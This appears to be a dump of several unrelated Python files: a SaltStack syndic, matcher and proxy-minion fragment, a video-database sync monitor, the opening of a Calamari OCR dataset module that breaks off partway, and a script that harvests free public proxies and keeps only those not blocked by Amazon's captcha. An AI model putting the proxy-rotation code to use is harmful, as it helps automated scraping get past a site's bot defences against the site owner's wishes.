self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`):
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way), this daemon does not handle failure well;
under most circumstances it will stall for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which we were unable to send for some reason and will be resent to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if it's connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call '_return_pub_multi' on a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event {0}'.format(mtag)) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level master, don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = self.job_rets[master].values()
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: {0}'.format(tgt))
return []
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = str(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
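# Join the per-word boolean results and operators into a Python expression and evaluate it to get the final match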
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
log.debug("subclassed _post_master_init")
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar for id '+self.opts['id']+'. '+\
'Check your pillar configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv='base')
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname)+\
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
'__master_alive_{0}'.format(self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
'__master_failback':
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job('__master_failback', persist=True)
else:
self.schedule.delete_job('__master_alive_{0}'.format(self.opts['master']), persist=True)
self.schedule.delete_job('__master_failback', persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
|
proxy_list_scrape.py
|
import requests
from bs4 import BeautifulSoup
import pandas as pd
import re
from multiprocessing import Process, Queue, Pool, Manager
def testProxies(aProxy, headers, q):
#Collect working proxies in the 'all' list so they can be put on the queue
all=[]
if 'http' in aProxy:
printProxy = aProxy['http']
else:
printProxy = aProxy['https']
try:
#print("in the try")
r = requests.get("https://www.amazon.com/s?k=cereal&page=1", headers=headers, proxies=aProxy, timeout=15)
except:
#print("in the except")
#print("There was a connection error")
print("Bad Proxy Check: " + printProxy)
else:
#print("in the else")
content = r.content
soup = BeautifulSoup(content, features="lxml")
if len(soup.findAll('div', attrs={'data-index':re.compile(r'\d+')})) == 0:
#print("There was a captcha error")
print("Bad Proxy Check: " + printProxy)
else:
#If nothing is wrong with the proxy, add the proxy and put it in the queue
all.append(aProxy)
q.put(all)
return
def scrapeProxyList(proxyCounter):
#m = Manager()
#q = m.Queue() # use this manager Queue instead of multiprocessing Queue as that causes error
#qcount = 0
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0", "Accept-Encoding":"gzip, deflate", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "DNT":"1","Connection":"close", "Upgrade-Insecure-Requests":"1"}
#Create a list of dictionaries to return for proxy purposes
proxyList = []
#workingProxyList = []
r = requests.get("https://www.us-proxy.org/", headers=headers)
content = r.content
soup = BeautifulSoup(content, features="lxml")
#with open('proxy_scrape.html', 'w', encoding='utf-8') as outfile:
#outfile.write(str(soup))
#print(soup.encode('utf-8')) # uncomment this in case there is some non UTF-8 character in the content and
# you get error
for d in soup.findAll('tr'):
address = d.contents[0]
port = d.contents[1]
https = d.contents[6]
if address.text != "IP Address" and https is not None and address is not None and port is not None:
if https.text == "yes":
proxyList.append( {'http': 'http://' + address.text + ":" + port.text} )
elif https.text == "no":
proxyList.append( {'https': 'https://' + address.text + ":" + port.text} )
###TESTING THE PROXIES IS SOMETHING THAT SHOULD BE DONE WITH MULTIPROCESSING; SEE THE COMMENTED-OUT CODE BELOW
#p = {}
#for i in range(len(proxyList)):
# print("starting proxy process: ", i)
# p[i] = Process(target=testProxies, args=(proxyList[i], headers, q))
# p[i].start()
# join should be done in a separate for loop:
# if we join inside the previous for loop, the join for p1 blocks after the first
# iteration until that process finishes, so the work effectively becomes serial instead of
# parallel
#for i in range(len(proxyList)):
# p[i].join()
# print("Proxy " + str(i) + " joined")
#while q.empty() is not True:
# qcount = qcount+1
# queue_top = q.get()
# workingProxyList.append(queue_top[0])
# print("Proxy Q " + str(qcount) + " pulled")
#Only run once everything is done
#print("proxy qcount: ", qcount)
return proxyList[:proxyCounter]
#return workingProxyList
def scrapeProxyListUK(proxyCounter):
#m = Manager()
#q = m.Queue() # use this manager Queue instead of multiprocessing Queue as that causes error
#qcount = 0
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0", "Accept-Encoding":"gzip, deflate", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "DNT":"1","Connection":"close", "Upgrade-Insecure-Requests":"1"}
#Create a list of dictionaries to return for proxy purposes
proxyList = []
#workingProxyList = []
r = requests.get("https://free-proxy-list.net/uk-proxy.html", headers=headers)
content = r.content
soup = BeautifulSoup(content, features="lxml")
#with open('proxy_scrape.html', 'w', encoding='utf-8') as outfile:
#outfile.write(str(soup))
#print(soup.encode('utf-8')) # uncomment this in case there is some non UTF-8 character in the content and
# you get error
for d in soup.findAll('tr'):
address = d.contents[0]
port = d.contents[1]
https = d.contents[6]
if address.text != "IP Address" and https is not None and address is not None and port is not None:
if https.text == "yes":
proxyList.append( {'http': 'http://' + address.text + ":" + port.text} )
elif https.text == "no":
proxyList.append( {'https': 'https://' + address.text + ":" + port.text} )
###TESTING THE PROXIES IS SOMETHING THAT SHOULD BE DONE WITH MULTIPROCESSING; SEE THE COMMENTED-OUT CODE BELOW
#p = {}
#for i in range(len(proxyList)):
# print("starting proxy process: ", i)
# p[i] = Process(target=testProxies, args=(proxyList[i], headers, q))
# p[i].start()
# join should be done in a separate for loop:
# if we join inside the previous for loop, the join for p1 blocks after the first
# iteration until that process finishes, so the work effectively becomes serial instead of
# parallel
#for i in range(len(proxyList)):
# p[i].join()
# print("Proxy " + str(i) + " joined")
#while q.empty() is not True:
# qcount = qcount+1
# queue_top = q.get()
# workingProxyList.append(queue_top[0])
# print("Proxy Q " + str(qcount) + " pulled")
#Only run once everything is done
#print("proxy qcount: ", qcount)
return proxyList[:proxyCounter]
#return workingProxyList
#Comment this out after testing ;)
#print(scrapeProxyList())
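#Hedged usage sketch (assumption, not part of the original module): one way to validate the
#scraped proxies concurrently with the testProxies() helper above, mirroring the
#commented-out Process/Queue code in scrapeProxyList(). The header dict is illustrative only.
#if __name__ == "__main__":
#    m = Manager()
#    q = m.Queue()
#    headers = {"User-Agent": "Mozilla/5.0"}
#    candidates = scrapeProxyList(10)
#    procs = [Process(target=testProxies, args=(p, headers, q)) for p in candidates]
#    for proc in procs:
#        proc.start()
#    for proc in procs:
#        proc.join()
#    workingProxyList = []
#    while not q.empty():
#        workingProxyList.append(q.get()[0])
#    print("working proxies:", workingProxyList)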
|
vms_async_monitor.py
|
# coding: utf-8
#------------------------------
# video data sync monitor
#------------------------------
import sys
import os
import json
import time
import threading
import subprocess
import shutil
import base64
sys.path.append("/usr/local/lib/python2.7/site-packages")
import psutil
sys.path.append(os.getcwd() + "/class/core")
reload(sys)
sys.setdefaultencoding('utf-8')
import requests
import db
import common
#------------Private Methods--------------
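# updateStatus: mark the video_tmp row identified by sid with the given sync status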
def updateStatus(sid, status):
common.M('video_tmp').where(
"id=?", (sid,)).setField('status', status)
def isDEmpty(data):
if len(data) > 0:
return False
return True
#------------Private Methods--------------
#------------Public Methods--------------
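# isMasterNode: return True when this instance runs as a master (run_model == '1' or run_is_master == '1')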
def isMasterNode():
run_model = common.getSysKV('run_model')
run_is_master = common.getSysKV('run_is_master')
if (run_model == '1') or (run_is_master == '1'):
return True
return False
def getNodeList(ismaster=1, status=0):
_list = common.M('node').field('id,info,port,name,ip').where(
'ismaster=? and status=?', (ismaster, status,)).select()
return _list
def postVideoDbAsyncTrigger(url, name):
ret = common.httpPost(url, {
'name': name
})
if ret:
return json.loads(ret)
return False
#------------Public Methods--------------
def videoDbIsChange():
'''
# The video DB has changed; the master server decides which slave servers the file is synced to
'''
mtime = os.stat('data/video.db').st_mtime
while True:
time_sleep = 2
if not isMasterNode():
time.sleep(time_sleep)
continue
tmp = os.stat('data/video.db').st_mtime
if tmp != mtime:
node_list = getNodeList(0, 1)
for x in xrange(0, len(node_list)):
# print(node_list[x])
url = 'http://' + node_list[x]['ip'] + \
':' + node_list[x]['port'] + \
'/async_slave_api/videoDbAsyncTrigger'
try:
r = postVideoDbAsyncTrigger(url, node_list[x]['name'])
if r and r['code'] == 0:
print("DB文件发生改变通知成功:" + url)
else:
print("DB文件发生改变通知失败:" + url)
except Exception as e:
print("DB文件发生改变异常通知失败:" + url + ':', e)
mtime = tmp
time.sleep(time_sleep)
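# startTask: keep the main process alive; on any exception, back off for 60 seconds and restart the wait loop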
def startTask():
import time
try:
while True:
time.sleep(2)
except:
time.sleep(60)
startTask()
if __name__ == "__main__":
# sync files
t = threading.Thread(target=videoDbIsChange)
t.setDaemon(True)
t.start()
startTask()
|
input_dataset.py
|
from .dataset import DataSet, DataSetMode, RawDataSet
from calamari_ocr.ocr.data_processing import DataPreprocessor
from calamari_ocr.ocr.text_processing import TextProcessor
from calamari_ocr.ocr.augmentation import DataAugmenter
from typing import Generator, Tuple, List, Any
import numpy as np
import multiprocessing
from collections import namedtuple
import queue
from calamari_ocr.utils.multiprocessing import tqdm_wrapper
from abc import ABC, abstractmethod
import logging
from .queue_helper import MaxElementsQueuer
logger = logging.getLogger(__name__)
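# OrderedQueueTask: background process that re-orders results coming off the worker pool so samples leave the output queue in their original index order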
class OrderedQueueTask:
def __init__(self, input_queue, output_queue, context=multiprocessing.get_context()):
self.input_queue = input_queue
self.output_queue = output_queue
self.context = context
self.p = self.context.Process(daemon=True, target=self.run)
def start(self):
self.p.start()
def stop(self):
self.p.terminate()
def join(self):
self.p.join()
def run(self) -> None:
data = []
current_idx = 0
while True:
while True:
try:
data.append(self.input_queue.get(timeout=0.1))
except queue.Empty:
continue
except KeyboardInterrupt:
return
break
data.sort(key=lambda data: data[0])
while len(data) > 0 and data[0][0] <= current_idx:
try:
self.output_queue.put(data[0], timeout=0.1)
self.output_queue.task_done()
del data[0]
current_idx += 1
except queue.Full:
continue
except KeyboardInterrupt:
return
DataProcessingTaskData = namedtuple("DataProcessingTaskData", [
"skip_invalid_gt",
"data_aug_ratio",
"text_processor",
"data_processor",
"data_augmenter",
"generate_only_non_augmented",
])
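# DataProcessingTask: worker process that applies data/text preprocessing and optional augmentation to samples pulled from the input queue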
class DataProcessingTask:
def __init__(self, params, input_queue: multiprocessing.JoinableQueue, output_queue: multiprocessing.JoinableQueue, context=multiprocessing.get_context()):
self.params = params
self.input_queue = input_queue
self.output_queue = output_queue
self.p = context.Process(daemon=True, target=self.run)
def start(self):
self.p.start()
def stop(self):
self.p.terminate()
def join(self):
self.p.join()
def run(self) -> None:
while True:
try:
data = self.input_queue.get(timeout=0.1)
except queue.Empty:
continue
except KeyboardInterrupt:
# allow keyboard interrupt
return
out = self.apply_single(*data)
if out:
while True:
try:
self.output_queue.put(out, timeout=0.1)
break
except queue.Full:
continue
except KeyboardInterrupt:
return
self.output_queue.task_done()
def apply_single(self, idx, sample_id, line, text):
#if not dataset.is_sample_valid(sample, line, text):
# if not skip_invalid_gt:
# print("ERROR: invalid sample {}".format(sample))
# return None
if self.params.data_processor and line is not None:
line, params = self.params.data_processor.apply([line], 1, False)[0]
else:
params = None
if self.params.text_processor and text is not None:
text = self.params.text_processor.apply([text], 1, False)[0]
if line is not None and not self.params.generate_only_non_augmented.value and self.params.data_augmenter and np.random.rand() <= self.params.data_aug_ratio:
# data augmentation with given ratio
line, text = self.params.data_augmenter.augment_single(line, text)
return idx, sample_id, line, text, params
class InputDataset(ABC):
def __init__(self,
mode: DataSetMode,
):
self.mode = mode
self._generate_only_non_augmented = multiprocessing.Value('b', False)
self.initialized = False
def __enter__(self):
if self.initialized:
raise AssertionError("Input dataset already initialized.")
logger.debug("InputDataset {} entered".format(self))
self.initialized = True
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.initialized = False
logger.debug("InputDataset {} exited".format(self))
def check_initialized(self):
if not self.initialized:
